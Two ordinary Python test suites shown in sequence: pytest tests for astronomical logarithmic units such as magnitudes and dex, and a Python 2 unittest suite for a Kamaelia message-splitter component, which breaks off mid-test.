u.MagUnit(u.Jy, -1*u.mag), u.MagUnit(u.m, -2.*u.mag)))
def test_different_units(self, unit):
q = u.Magnitude(1.23, unit)
assert q.unit.function_unit == getattr(unit, 'function_unit', unit)
assert q.unit.physical_unit is getattr(unit, 'physical_unit',
u.dimensionless_unscaled)
@pytest.mark.parametrize('value, unit', (
(1.*u.mag(u.Jy), None),
(1.*u.dex(u.Jy), None),
(1.*u.mag(u.W/u.m**2/u.Hz), u.mag(u.Jy)),
(1.*u.dex(u.W/u.m**2/u.Hz), u.mag(u.Jy))))
def test_function_values(self, value, unit):
lq = u.Magnitude(value, unit)
assert lq == value
assert lq.unit.function_unit == u.mag
assert lq.unit.physical_unit == getattr(unit, 'physical_unit',
value.unit.physical_unit)
@pytest.mark.parametrize(
'unit', (u.mag(), u.mag(u.Jy), u.mag(u.m), u.MagUnit('', 2.*u.mag),
u.MagUnit(u.Jy, -1*u.mag), u.MagUnit(u.m, -2.*u.mag)))
def test_indirect_creation(self, unit):
q1 = 2.5 * unit
assert isinstance(q1, u.Magnitude)
assert q1.value == 2.5
assert q1.unit == unit
pv = 100. * unit.physical_unit
q2 = unit * pv
assert q2.unit == unit
assert q2.unit.physical_unit == pv.unit
assert q2.to_value(unit.physical_unit) == 100.
assert (q2._function_view / u.mag).to_value(1) == -5.
q3 = unit / 0.4
assert q3 == q1
def test_from_view(self):
# Cannot view a physical quantity as a function quantity, since the
# values would change.
q = [100., 1000.] * u.cm/u.s**2
with pytest.raises(TypeError):
q.view(u.Dex)
# But fine if we have the right magnitude.
q = [2., 3.] * u.dex
lq = q.view(u.Dex)
assert isinstance(lq, u.Dex)
assert lq.unit.physical_unit == u.dimensionless_unscaled
assert np.all(q == lq)
def test_using_quantity_class(self):
"""Check that we can use Quantity if we have subok=True"""
# following issue #5851
lu = u.dex(u.AA)
with pytest.raises(u.UnitTypeError):
u.Quantity(1., lu)
q = u.Quantity(1., lu, subok=True)
assert type(q) is lu._quantity_class
def test_conversion_to_and_from_physical_quantities():
"""Ensures we can convert from regular quantities."""
mst = [10., 12., 14.] * u.STmag
flux_lambda = mst.physical
mst_roundtrip = flux_lambda.to(u.STmag)
# check we return a logquantity; see #5178.
assert isinstance(mst_roundtrip, u.Magnitude)
assert mst_roundtrip.unit == mst.unit
assert_allclose(mst_roundtrip.value, mst.value)
wave = [4956.8, 4959.55, 4962.3] * u.AA
flux_nu = mst.to(u.Jy, equivalencies=u.spectral_density(wave))
mst_roundtrip2 = flux_nu.to(u.STmag, u.spectral_density(wave))
assert isinstance(mst_roundtrip2, u.Magnitude)
assert mst_roundtrip2.unit == mst.unit
assert_allclose(mst_roundtrip2.value, mst.value)
def test_quantity_decomposition():
lq = 10.*u.mag(u.Jy)
assert lq.decompose() == lq
assert lq.decompose().unit.physical_unit.bases == [u.kg, u.s]
assert lq.si == lq
assert lq.si.unit.physical_unit.bases == [u.kg, u.s]
assert lq.cgs == lq
assert lq.cgs.unit.physical_unit.bases == [u.g, u.s]
class TestLogQuantityViews:
def setup(self):
self.lq = u.Magnitude(np.arange(1., 10.) * u.Jy)
self.lq2 = u.Magnitude(np.arange(1., 5.))
def test_value_view(self):
lq_value = self.lq.value
assert type(lq_value) is np.ndarray
lq_value[2] = -1.
assert np.all(self.lq.value == lq_value)
def test_function_view(self):
lq_fv = self.lq._function_view
assert type(lq_fv) is u.Quantity
assert lq_fv.unit is self.lq.unit.function_unit
lq_fv[3] = -2. * lq_fv.unit
assert np.all(self.lq.value == lq_fv.value)
def test_quantity_view(self):
# Cannot view as Quantity, since the unit cannot be represented.
with pytest.raises(TypeError):
self.lq.view(u.Quantity)
# But a dimensionless one is fine.
q2 = self.lq2.view(u.Quantity)
assert q2.unit is u.mag
assert np.all(q2.value == self.lq2.value)
lq3 = q2.view(u.Magnitude)
assert type(lq3.unit) is u.MagUnit
assert lq3.unit.physical_unit == u.dimensionless_unscaled
assert np.all(lq3 == self.lq2)
class TestLogQuantitySlicing:
def test_item_get_and_set(self):
lq1 = u.Magnitude(np.arange(1., 11.)*u.Jy)
assert lq1[9] == u.Magnitude(10.*u.Jy)
lq1[2] = 100.*u.Jy
assert lq1[2] == u.Magnitude(100.*u.Jy)
with pytest.raises(u.UnitsError):
lq1[2] = 100.*u.m
with pytest.raises(u.UnitsError):
lq1[2] = 100.*u.mag
with pytest.raises(u.UnitsError):
lq1[2] = u.Magnitude(100.*u.m)
assert lq1[2] == u.Magnitude(100.*u.Jy)
def test_slice_get_and_set(self):
lq1 = u.Magnitude(np.arange(1., 10.)*u.Jy)
lq1[2:4] = 100.*u.Jy
assert np.all(lq1[2:4] == u.Magnitude(100.*u.Jy))
with pytest.raises(u.UnitsError):
lq1[2:4] = 100.*u.m
with pytest.raises(u.UnitsError):
lq1[2:4] = 100.*u.mag
with pytest.raises(u.UnitsError):
lq1[2:4] = u.Magnitude(100.*u.m)
assert np.all(lq1[2] == u.Magnitude(100.*u.Jy))
class TestLogQuantityArithmetic:
def test_multiplication_division(self):
"""Check that multiplication/division with other quantities is only
possible when the physical unit is dimensionless, and that this turns
the result into a normal quantity."""
lq = u.Magnitude(np.arange(1., 11.)*u.Jy)
with pytest.raises(u.UnitsError):
lq * (1.*u.m)
with pytest.raises(u.UnitsError):
(1.*u.m) * lq
with pytest.raises(u.UnitsError):
lq / lq
for unit in (u.m, u.mag, u.dex):
with pytest.raises(u.UnitsError):
lq / unit
lq2 = u.Magnitude(np.arange(1, 11.))
with pytest.raises(u.UnitsError):
lq2 * lq
with pytest.raises(u.UnitsError):
lq2 / lq
with pytest.raises(u.UnitsError):
lq / lq2
# but dimensionless_unscaled can be cancelled
r = lq2 / u.Magnitude(2.)
assert r.unit == u.dimensionless_unscaled
assert np.all(r.value == lq2.value/2.)
# with dimensionless, normal units OK, but return normal quantities
tf = lq2 * u.m
tr = u.m * lq2
for t in (tf, tr):
assert not isinstance(t, type(lq2))
assert t.unit == lq2.unit.function_unit * u.m
with u.set_enabled_equivalencies(u.logarithmic()):
with pytest.raises(u.UnitsError):
t.to(lq2.unit.physical_unit)
t = tf / (50.*u.cm)
# now we essentially have the same quantity but with a prefactor of 2
assert t.unit.is_equivalent(lq2.unit.function_unit)
assert_allclose(t.to(lq2.unit.function_unit), lq2._function_view*2)
@pytest.mark.parametrize('power', (2, 0.5, 1, 0))
def test_raise_to_power(self, power):
"""Check that raising LogQuantities to some power is only possible when
the physical unit is dimensionless, and that conversion is turned off
when the resulting logarithmic unit (say, mag**2) is incompatible."""
lq = u.Magnitude(np.arange(1., 4.)*u.Jy)
if power == 0:
assert np.all(lq ** power == 1.)
elif power == 1:
assert np.all(lq ** power == lq)
else:
with pytest.raises(u.UnitsError):
lq ** power
# with dimensionless, it works, but falls back to normal quantity
# (except for power=1)
lq2 = u.Magnitude(np.arange(10.))
t = lq2**power
if power == 0:
assert t.unit is u.dimensionless_unscaled
assert np.all(t.value == 1.)
elif power == 1:
assert np.all(t == lq2)
else:
assert not isinstance(t, type(lq2))
assert t.unit == lq2.unit.function_unit ** power
with u.set_enabled_equivalencies(u.logarithmic()):
with pytest.raises(u.UnitsError):
t.to(u.dimensionless_unscaled)
def test_error_on_lq_as_power(self):
lq = u.Magnitude(np.arange(1., 4.)*u.Jy)
with pytest.raises(TypeError):
lq ** lq
@pytest.mark.parametrize('other', pu_sample)
def test_addition_subtraction_to_normal_units_fails(self, other):
lq = u.Magnitude(np.arange(1., 10.)*u.Jy)
q = 1.23 * other
with pytest.raises(u.UnitsError):
lq + q
with pytest.raises(u.UnitsError):
lq - q
with pytest.raises(u.UnitsError):
q - lq
@pytest.mark.parametrize(
'other', (1.23 * u.mag, 2.34 * u.mag(),
u.Magnitude(3.45 * u.Jy), u.Magnitude(4.56 * u.m),
5.67 * u.Unit(2*u.mag), u.Magnitude(6.78, 2.*u.mag)))
def test_addition_subtraction(self, other):
"""Check that addition/subtraction with quantities with magnitude or
MagUnit units works, and that it changes the physical units
appropriately."""
lq = u.Magnitude(np.arange(1., 10.)*u.Jy)
other_physical = other.to(getattr(other.unit, 'physical_unit',
u.dimensionless_unscaled),
equivalencies=u.logarithmic())
lq_sf = lq + other
assert_allclose(lq_sf.physical, lq.physical * other_physical)
lq_sr = other + lq
assert_allclose(lq_sr.physical, lq.physical * other_physical)
lq_df = lq - other
assert_allclose(lq_df.physical, lq.physical / other_physical)
lq_dr = other - lq
assert_allclose(lq_dr.physical, other_physical / lq.physical)
@pytest.mark.parametrize('other', pu_sample)
def test_inplace_addition_subtraction_unit_checks(self, other):
lu1 = u.mag(u.Jy)
lq1 = u.Magnitude(np.arange(1., 10.), lu1)
with pytest.raises(u.UnitsError):
lq1 += other
assert np.all(lq1.value == np.arange(1., 10.))
assert lq1.unit == lu1
with pytest.raises(u.UnitsError):
lq1 -= other
assert np.all(lq1.value == np.arange(1., 10.))
assert lq1.unit == lu1
@pytest.mark.parametrize(
'other', (1.23 * u.mag, 2.34 * u.mag(),
u.Magnitude(3.45 * u.Jy), u.Magnitude(4.56 * u.m),
5.67 * u.Unit(2*u.mag), u.Magnitude(6.78, 2.*u.mag)))
def test_inplace_addition_subtraction(self, other):
"""Check that inplace addition/subtraction with quantities with
magnitude or MagUnit units works, and that it changes the physical
units appropriately."""
lq = u.Magnitude(np.arange(1., 10.)*u.Jy)
other_physical = other.to(getattr(other.unit, 'physical_unit',
u.dimensionless_unscaled),
equivalencies=u.logarithmic())
lq_sf = lq.copy()
lq_sf += other
assert_allclose(lq_sf.physical, lq.physical * other_physical)
lq_df = lq.copy()
lq_df -= other
assert_allclose(lq_df.physical, lq.physical / other_physical)
def test_complicated_addition_subtraction(self):
"""For fun, a more complicated example of addition and subtraction."""
dm0 = u.Unit('DM', 1./(4.*np.pi*(10.*u.pc)**2))
DMmag = u.mag(dm0)
m_st = 10. * u.STmag
dm = 5. * DMmag
M_st = m_st - dm
assert M_st.unit.is_equivalent(u.erg/u.s/u.AA)
assert np.abs(M_st.physical /
(m_st.physical*4.*np.pi*(100.*u.pc)**2) - 1.) < 1.e-15
class TestLogQuantityComparisons:
def test_comparison_to_non_quantities_fails(self):
lq = u.Magnitude(np.arange(1., 10.)*u.Jy)
with pytest.raises(TypeError):
lq > 'a'
assert not (lq == 'a')
assert lq != 'a'
def test_comparison(self):
lq1 = u.Magnitude(np.arange(1., 4.)*u.Jy)
lq2 = u.Magnitude(2.*u.Jy)
assert np.all((lq1 > lq2) == np.array([True, False, False]))
assert np.all((lq1 == lq2) == np.array([False, True, False]))
lq3 = u.Dex(2.*u.Jy)
assert np.all((lq1 > lq3) == np.array([True, False, False]))
assert np.all((lq1 == lq3) == np.array([False, True, False]))
lq4 = u.Magnitude(2.*u.m)
assert not (lq1 == lq4)
assert lq1 != lq4
with pytest.raises(u.UnitsError):
lq1 < lq4
q5 = 1.5 * u.Jy
assert np.all((lq1 > q5) == np.array([True, False, False]))
assert np.all((q5 < lq1) == np.array([True, False, False]))
with pytest.raises(u.UnitsError):
lq1 >= 2.*u.m
with pytest.raises(u.UnitsError):
lq1 <= lq1.value * u.mag
# For physically dimensionless, we can compare with the function unit.
lq6 = u.Magnitude(np.arange(1., 4.))
fv6 = lq6.value * u.mag
assert np.all(lq6 == fv6)
# but not some arbitrary unit, of course.
with pytest.raises(u.UnitsError):
lq6 < 2.*u.m
class TestLogQuantityMethods:
def setup(self):
self.mJy = np.arange(1., 5.).reshape(2, 2) * u.mag(u.Jy)
self.m1 = np.arange(1., 5.5, 0.5).reshape(3, 3) * u.mag()
self.mags = (self.mJy, self.m1)
@pytest.mark.parametrize('method', ('mean', 'min', 'max', 'round', 'trace',
'std', 'var', 'ptp', 'diff', 'ediff1d'))
def test_always_ok(self, method):
for mag in self.mags:
res = getattr(mag, method)()
assert np.all(res.value ==
getattr(mag._function_view, method)().value)
if method in ('std', 'ptp', 'diff', 'ediff1d'):
assert res.unit == u.mag()
elif method == 'var':
assert res.unit == u.mag**2
else:
assert res.unit == mag.unit
def test_clip(self):
for mag in self.mags:
assert np.all(mag.clip(2. * mag.unit, 4. * mag.unit).value ==
mag.value.clip(2., 4.))
@pytest.mark.parametrize('method', ('sum', 'cumsum', 'nansum'))
def test_only_ok_if_dimensionless(self, method):
res = getattr(self.m1, method)()
assert np.all(res.value ==
getattr(self.m1._function_view, method)().value)
assert res.unit == self.m1.unit
with pytest.raises(TypeError):
getattr(self.mJy, method)()
def test_dot(self):
assert np.all(self.m1.dot(self.m1).value ==
self.m1.value.dot(self.m1.value))
@pytest.mark.parametrize('method', ('prod', 'cumprod'))
def test_never_ok(self, method):
with pytest.raises(TypeError):
getattr(self.mJy, method)()
with pytest.raises(TypeError):
getattr(self.m1, method)()
|
|
#!/usr/bin/env python2.3
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
import unittest
from Kamaelia.Util.Splitter import PlugSplitter as Splitter
from Kamaelia.Util.Splitter import addsink, removesink
from Kamaelia.Util.Splitter import Plug
from Axon.Ipc import producerFinished, shutdownMicroprocess
import Axon.Scheduler
from Axon.Scheduler import scheduler
from Axon.Linkage import linkage
from Axon.Component import component
from Axon.Axon import AxonObject
import Axon
import gc
#from test_Component import Component_Test
class DummyComponent(Axon.Component.component):
"""Simple component that terminates on receiving suitable messages,
but also logs all incoming messages"""
def __init__(self):
super(DummyComponent, self).__init__()
self.inboxlog = []
self.controllog = []
def main(self):
done=False
while not done:
yield 1
if self.dataReady("inbox"):
self.inboxlog.append(self.recv("inbox"))
if self.dataReady("control"):
msg = self.recv("control")
self.controllog.append(msg)
if isinstance(msg, producerFinished) or isinstance(msg, shutdownMicroprocess):
done=True
class TestComponent(component):
Inboxes = ["inbox","control","test"]
class DummyPostman:
def registerlinkage(self,linkage):
self.linkage=linkage
def runrepeat(gen, count = 100):
"""This just runs the specified generator the specified number of times. This
is used to try to make sure expected behaviour has sufficient timeslots to
succeed without taking too long."""
for i in xrange(count):
gen.next()
class Timeout(Exception):
def __init__(self, t=-1):
self.t = t
class Splitter_Test(unittest.TestCase):
def setUp(self):
self.src = component()
self.dst = component()
self.dst2 = TestComponent()
self.controller = component()
self.split = Splitter()
self.runner = self.split.main()
self.linkin = linkage(self.src,self.split)
self.linkcont = linkage(self.controller, self.split, sinkbox="configuration")
self.links = [self.linkin, self.linkcont]
# self.linkout1 = linkage(self.split,self.dst)
# self.linkout2 = linkage(self.split,self.dst2, sourcebox="out2")
#
# -- NEW STUFF ------
#
Axon.Scheduler.scheduler.run = Axon.Scheduler.scheduler()
self.execute = Axon.Scheduler.scheduler.run.main()
self.S = Splitter().activate()
self.D = component().activate()
self.D2 = TestComponent().activate()
self.W = component().activate()
self.W.link( (self.W, "outbox"), (self.S, "configuration") )
def waitEvent(self, cycles, conditionFunc, *args):
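"""Advance the scheduler until conditionFunc(*args) is true, raising Timeout if that does not happen within the given number of cycles."""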
i = 0
while 1:
self.execute.next()
if conditionFunc(*args):
break
else:
i += 1
if i > cycles:
raise Timeout(i)
def runCycles(self, cycles=20):
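"""Advance the shared scheduler by the given number of cycles."""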
for _ in xrange(cycles):
self.execute.next()
def deliverhelper(self):
# No longer needed: direct delivery has since been implemented, so this is a no-op.
pass
def test_isacomponent(self):
"__init__ - Splitter is a component."
self.failUnless(isinstance(self.split,component))
def test_simplepassthrough_defaultbox(self):
"""mainBody - This test sets up a sink and checks it receives sent messages using the default box."""
self.W.send(addsink(self.D), "outbox")
data = [ 1,2,3,4,5,6]
for i in data:
self.S._deliver(i, "inbox")
try:
self.waitEvent(10, self.D.dataReady, "inbox" )
except Timeout, e:
self.fail("Data hasn't arrived after "+str(e.t)+" cycles")
R = []
while 1:
try:
R.append(self.D.recv("inbox"))
except:
break
self.assert_( R == data )
def test_simplepassthrough(self):
"""mainBody - addsink -> configuration - An addsink object is sent to the
configuration box and it creates a new sink. A new outbox is created and
linked to the sink."""
self.W.send(addsink(self.D2, "test"))
data = [ 1,2,3,4,5,6]
for i in data:
self.S._deliver(i, "inbox")
try:
self.waitEvent(10, self.D2.dataReady, "test" )
except Timeout, e:
self.fail("Data hasn't arrived after "+str(e.t)+" cycles")
R = []
while 1:
try:
R.append(self.D2.recv("test"))
except:
break
self.assert_( R == data )
def test_addOutboxes(self):
"""mainBody - addsink->configurations - Adds a whole set of sinks and checks
they all receive expected messages."""
boxes = 10
boxlist = []
for x in xrange(boxes):
c=component()
boxlist.append(c)
self.controller.send(addsink(c))
self.deliverhelper()
runrepeat(self.runner)
for i in xrange(20):
self.src.send(i)
self.deliverhelper()
runrepeat(self.runner)
self.deliverhelper()
for comp in boxlist:
self.failUnless(comp.dataReady())
self.failUnless(comp.recv() == i)
def test_addSinkInboxes_passthrough(self):
"""mainBody - addsink->configurations - Adds a whole set of sinks and checks
they all receive expected messages. Complicated by setting the sink to
passthrough and to be to an inbox."""
boxes = 10
boxlist = []
for x in xrange(boxes):
c=component()
boxlist.append(c)
self.links.append(linkage(source=c, sourcebox="outbox", sink=c, sinkbox="control"))
self.controller.send(addsink(c,"outbox",2))
self.deliverhelper()
runrepeat(self.runner)
for i in xrange(20):
self.src.send(i)
self.deliverhelper()
runrepeat(self.runner)
self.deliverhelper()
self.deliverhelper()
for comp in boxlist:
self.failUnless(comp.dataReady("control"))
self.failUnless(comp.recv("control") == i)
def test_removeOutboxes_default(self):
"""mainBody - addsink|removesink->configuration - Tests addition and removal
of sinks using the default box arguments. Adds an array of sinks, removes
the odd items and then checks that messages are delivered to the even
sinks and not the odd ones."""
boxes = 10
boxlist = {}
for x in xrange(boxes):
C = component().activate()
boxlist[x] = C
self.W.send(addsink(C), "outbox")
self.runCycles()
for x in xrange(1,boxes,2):
C = boxlist[x]
self.W.send(removesink(C), "outbox")
self.runCycles()
for i in xrange(20):
self.S._deliver(i, "inbox")
self.runCycles()
for j in xrange(0,boxes,2):
self.failUnless(boxlist[j].dataReady("inbox"))
self.failUnless(boxlist[j].recv("inbox") == i)
for j in xrange(1,boxes,2):
self.failIf(boxlist[j].dataReady("inbox"))
def test_removeOutboxes(self):
"""mainBody - addsink|removesink->configuration inbox - Tests addition and
removal of sinks. Adds an array of sinks, removes the odd items and then
checks that messages are delivered to the even sinks and not the odd ones."""
boxes = 10
boxlist = {}
for x in xrange(boxes):
C = TestComponent().activate()
boxlist[x] = C
self.W.send(addsink(C,"test"), "outbox")
self.runCycles()
for x in xrange(1,boxes,2):
C = boxlist[x]
self.W.send(removesink(C,"test"), "outbox")
self.runCycles()
for i in xrange(20):
self.S._deliver(i, "inbox")
self.runCycles()
for j in xrange(0,boxes,2):
self.failUnless(boxlist[j].dataReady("test"))
self.failUnless(boxlist[j].recv("test") == i)
for j in xrange(1,boxes,2):
self.failIf(boxlist[j].dataReady("test"))
def test_cleanup(self):
"""mainBody - addsink|removesink->configuration - Checks that there are no
object leaks by adding and then removing a sink and checking the
garbage collector for its count of AxonObjects and lists."""
self.controller.send(addsink(self.dst))
before = 0
for x in gc.get_objects():
if isinstance(x, AxonObject) or isinstance(x,list):
before = before + 1
self.controller.send(addsink(self.dst))
self.controller.send(removesink(self.dst))
after = 0
for x in gc.get_objects():
if isinstance(x, AxonObject) or isinstance(x,list):
after = after + 1
self.failUnless(before == after)
def drd(self):
"Deliver Run Deliver"
self.deliverhelper()
runrepeat(self.runner)
self.deliverhelper()
def test_multipleboxessinglecomponent(self):
"""mainBody - addsink|removesink->configuration - Checks that multiple sink
inboxes on a single component can be added and removed independently."""
self.W.send(addsink(self.D2,"test"), "outbox")
self.runCycles()
self.S._deliver("ba", "inbox")
self.runCycles()
self.failUnless(self.D2.dataReady("test"))
self.failIf(self.D2.dataReady("inbox"))
self.failIf(self.D2.dataReady("control"))
self.failUnless(self.D2.recv("test") == "ba")
self.W.send(addsink(self.D2), "outbox")
self.runCycles()
self.S._deliver("da", "inbox")
self.runCycles()
self.failUnless(self.D2.dataReady("test"))
self.failUnless(self.D2.dataReady("inbox")) #### FAILING : Should not(?)
self.failIf(self.D2.dataReady("control"))
self.failUnless(self.D2.recv("test") == "da")
self.failUnless(self.D2.recv("inbox") == "da") #### FAILING : Should not(?)
self.W.send(addsink(self.D2, "control"), "outbox")
self.runCycles()
self.S._deliver("bing", "inbox")
self.runCycles()
self.failUnless(self.D2.dataReady("test"))
self.failUnless(self.D2.dataReady("inbox")) #### FAILING : Should not(?)
self.failUnless(self.D2.dataReady("control")) #### FAILING : Should not(?)
self.failUnless(self.D2.recv("test") == "bing")
self.failUnless(self.D2.recv("inbox") == "bing") #### FAILING : Should not(?)
self.failUnless(self.D2.recv("control") == "bing") #### FAILING : Should not(?)
self.W.send(removesink(self.D2, "inbox"), "outbox")
self.runCycles()
self.S._deliver("a", "inbox")
self.runCycles()
self.failUnless(self.D2.dataReady("test"))
self.failIf(self.D2.dataReady("inbox"))
self.failUnless(self.D2.dataReady("control")) #### FAILING : Should not(?)
self.failUnless(self.D2.recv("test") == 'a')
self.failUnless(self.D2.recv("control") == 'a') #### FAILING : Should not(?)
self.W.send(removesink(self.D2, "control"), "outbox")
self.runCycles()
self.S._deliver("b", "inbox")
self.runCycles()
self.failUnless(self.D2.dataReady("test"))
self.failIf(self.D2.dataReady("inbox"))
self.failIf(self.D2.dataReady("control"))
self.failUnless(self.D2.recv("test") == 'b')
self.W.send(removesink(self.D2, "test"), "outbox")
self.runCycles()
self.S._deliver("c", "inbox")
self.runCycles()
self.failIf(self.D2.dataReady("test")) #### FAILING : Should not
self.failIf(self.D2.dataReady("inbox"))
self.failIf(self.D2.dataReady("control"))
#-----------------
def __test_createsink_defaultbox(self): # SMELL - internal diagnostic
"""createsink - Checks that a new sink is created and linked on calling creatsink with default box argument"""
self.split.createsink(self.dst)
for i in xrange(0,10):
self.src.send(i)
self.deliverhelper()
runrepeat(self.runner)
self.deliverhelper()
self.failUnless(self.dst.dataReady())
self.failUnless(self.dst.recv() == i)
def __test_simplepassthrough_createsink(self): # SMELL - internal diagnostic
"""createsink - Checks that a new sink is created and linked on calling creatsink with arguments"""
self.split.createsink(self.dst2,"test")
for i in xrange(0,10):
self.src.send(i)
self.deliverhelper()
runrepeat(self.runner)
self.deliverhelper()
self.failUnless(self.dst2.dataReady("test"))
self.failUnless(self.dst2.recv("test") == i)
def __test_addOutboxes_createsink(self): # SMELL - internal diagnostic
"""createsink - Called repeatedly. Adds a whole set of sinks and checks
they all receive expected messages."""
boxes = 10
boxlist = []
for x in xrange(boxes):
c=component()
boxlist.append(c)
self.split.createsink(c)
for i in xrange(20):
self.src.send(i)
self.deliverhelper()
runrepeat(self.runner)
self.deliverhelper()
for comp in boxlist:
self.failUnless(comp.dataReady())
self.failUnless(comp.recv() == i)
class PlugSplitter_Tests(unittest.TestCase):
def test_InstantiateNoArgs(self):
"""Splitter instantiated with no args is just passthrough"""
split = Splitter()
split.activate()
def test_PassThroughInboxOutbox(self):
"""Data sent to the inbox is sent on to the outbox"""
split = Splitter()
Dummy = Axon.Component.component()
split.link((split, "outbox"), (Dummy, "inbox"))
split.link((split, "signal"), (Dummy, "control"))
split.activate()
for i in xrange(1,10):
split._deliver( i, "inbox" )
for _ in xrange(0,100):
split.next()
for i in xrange(1,10):
self.assert_(len(split.outboxes["outbox"]))
self.assert_(0==len(split.outboxes["signal"]))
# self.assert_( i == split._collect("outbox") )
self.assert_( i == Dummy.recv("inbox") )
for i in xrange(1,10):
split._deliver( i, "inbox" )
split.next()
split.next()
for _ in xrange(0,10):
split.next()
for i in xrange(1,10):
self.assert_(len(split.outboxes["outbox"]))
self.assert_(0==len(split.outboxes["signal"]))
# self.assert_( i == split._collect("outbox") )
self.assert_( i == Dummy.recv("inbox") )
def test_PassThroughControlSignal(self):
"""Data sent to the inbox is sent on to the outbox"""
split = Splitter()
Dummy = Axon.Component.component()
split.link((split, "outbox"), (Dummy, "inbox"))
split.link((split, "signal"), (Dummy, "control"))
split.activate()
for i in xrange(1,10):
split._deliver( i, "control" )
for _ in xrange(0,100):
split.next()
for i in xrange(1,10):
self.assert_(len(split.outboxes["signal"]))
self.assert_(0==len(split.outboxes["outbox"]))
# self.assert_( i == split._collect("signal") )
self.assert_( i == Dummy.recv("control") )
for i in xrange(1,10):
split._deliver( i, "control" )
split.next()
split.next()
for _ in xrange(0,10):
split.next()
for i in xrange(1,10):
self.assert_(len(split.outboxes["signal"]))
self.assert_(0==len(split.outboxes["outbox"]))
# self.assert_( i == split._collect("signal") )
self.assert_( i == Dummy.recv("control") )
def test_SplitterShutdown(self):
"""If producerFinished or shutdownMicroprocess is received on the 'control' inbox they are passed on and the component shuts down"""
for msg in [producerFinished(self), shutdownMicroprocess(self)]:
split = Splitter()
Dummy = Axon.Component.component()
split.link((split, "outbox"), (Dummy, "inbox"))
split.link((split, "signal"), (Dummy, "control"))
split.activate()
for _ in xrange(0,10):
split.next()
self.assert_(0==len(split.outboxes["outbox"]))
self.assert_(0==len(split.outboxes["signal"]))
split._deliver( msg, "control" )
try:
for _ in xrange(0,10):
split.next()
self.fail()
except StopIteration:
pass
self.assert_(0==len(split.outboxes["outbox"]))
self.assert_(1==len(split.outboxes["signal"]))
# received = split._collect("signal")
received = Dummy.recv("control")
self.assert_( msg == received )
def test_SplitterAddLinkBoth(self):
"""Sending an addSink message to splitter links in an extra outbox and signal"""
Axon.Scheduler.scheduler.run = Axon.Scheduler.scheduler()
split = Splitter().activate()
target1 = Axon.Component.component().activate()
target2 = Axon.Component.component().activate()
target1.link( (split,"outbox"), (target1, "inbox") )
target1.link( (split,"signal"), (target1, "control") )
addmsg = addsink(target2, "inbox", "control")
split._deliver(addmsg, "configuration")
execute = Axon.Scheduler.scheduler.run.main()
for i in xrange(1,10):
execute.next()
for i in xrange(1,10):
split._deliver(i, "inbox")
split._deliver(10+i, "control")
execute.next()
for i in xrange(1,40):
execute.next()
# verify that the data has made it to the targets
for i in xrange(1,10):
self.assert_(target1.dataReady("inbox"))
self.assert_(target1.dataReady("control"))
self.assert_(i == target1.recv("inbox"))
self.assert_(10+i == target1.recv("control"))
self.assert_(target2.dataReady("inbox"))
self.assert_(target2.dataReady("control"))
self.assert_(i == target2.recv("inbox"))
self.assert_(10+i == target2.recv("control"))
# verify there is nothing left
self.assert_(not target1.dataReady("inbox"))
self.assert_(not target1.dataReady("control"))
self.assert_(not target2.dataReady("inbox"))
self.assert_(not target2.dataReady("control"))
def test_SplitterAddLinkOutboxOnly(self):
"""Sending an addSink message to splitter links in an extra outbox"""
Axon.Scheduler.scheduler.run = Axon.Scheduler.scheduler()
split = Splitter().activate()
target1 = Axon.Component.component().activate()
target2 = Axon.Component.component().activate()
target1.link( (split,"outbox"), (target1, "inbox") )
target1.link( (split,"signal"), (target1, "control") )
addmsg = addsink(target2, "inbox")
split._deliver(addmsg, "configuration")
execute = Axon.Scheduler.scheduler.run.main()
for i in xrange(1,10):
execute.next()
for i in xrange(1,10):
split._deliver(i, "inbox")
split._deliver(10+i, "control")
execute.next()
for i in xrange(1,40):
execute.next()
# verify that the data has made it to the targets
for i in xrange(1,10):
self.assert_(target1.dataReady("inbox"))
self.assert_(target1.dataReady("control"))
self.assert_(i == target1.recv("inbox"))
self.assert_(10+i == target1.recv("control"))
self.assert_(target2.dataReady("inbox"))
self.assert_(not target2.dataReady("control"))
self.assert_(i == target2.recv("inbox"))
# verify there is nothing left
self.assert_(not target1.dataReady("inbox"))
self.assert_(not target1.dataReady("control"))
self.assert_(not target2.dataReady("inbox"))
self.assert_(not target2.dataReady("control"))
def test_SplitterAddLinkSignalOnly(self):
"""Sending an addSink message to splitter links in an extra signal"""
Axon.Scheduler.scheduler.run = Axon.Scheduler.scheduler()
split = Splitter().activate()
target1 = Axon.Component.component().activate()
target2 = Axon.Component.component().activate()
target1.link( (split,"outbox"), (target1, "inbox") )
target1.link( (split,"signal"), (target1, "control") )
addmsg = addsink(target2, None, "control")
split._deliver(addmsg, "configuration")
execute = Axon.Scheduler.scheduler.run.main()
for i in xrange(1,10):
execute.next()
for i in xrange(1,10):
split._deliver(i, "inbox")
split._deliver(10+i, "control")
for j in xrange(1,10):
execute.next()
# verify that the data has made it to the targets
for i in xrange(1,10):
self.assert_(target1.dataReady("inbox"))
self.assert_(target1.dataReady("control"))
self.assert_(i == target1.recv("inbox"))
self.assert_(10+i == target1.recv("control"))
self.assert_(not target2.dataReady("inbox"))
self.assert_(target2.dataReady("control"))
self.assert_(10+i == target2.recv("control"))
# verify there is nothing left
self.assert_(not target1.dataReady("inbox"))
self.assert_(not target1.dataReady("control"))
self.assert_(not target2.dataReady("inbox"))
self.assert_(not target2.dataReady("control"))
def test_SplitterDelLinkBoth(self):
"""Sending an delSink message to splitter unlinks in the extra outbox and signal"""
Axon.Scheduler.scheduler.run = Axon.Scheduler.scheduler()
split = Splitter().activate()
target1 = Axon.Component.component().activate()
target2 = Axon.Component.component().activate()
target1.link( (split,"outbox"), (target1, "inbox") )
target1.link( (split,"signal"), (target1, "control") )
addmsg = addsink(target2, "inbox", "control")
split._deliver(addmsg, "configuration")
execute = Axon.Scheduler.scheduler.run.main()
for i in xrange(1,10):
execute.next()
for i in xrange(1,10):
if i == 5:
delmsg = removesink(target2, "inbox", "control")
split._deliver(delmsg, "configuration")
split._deliver(i, "inbox")
split._deliver(10+i, "control")
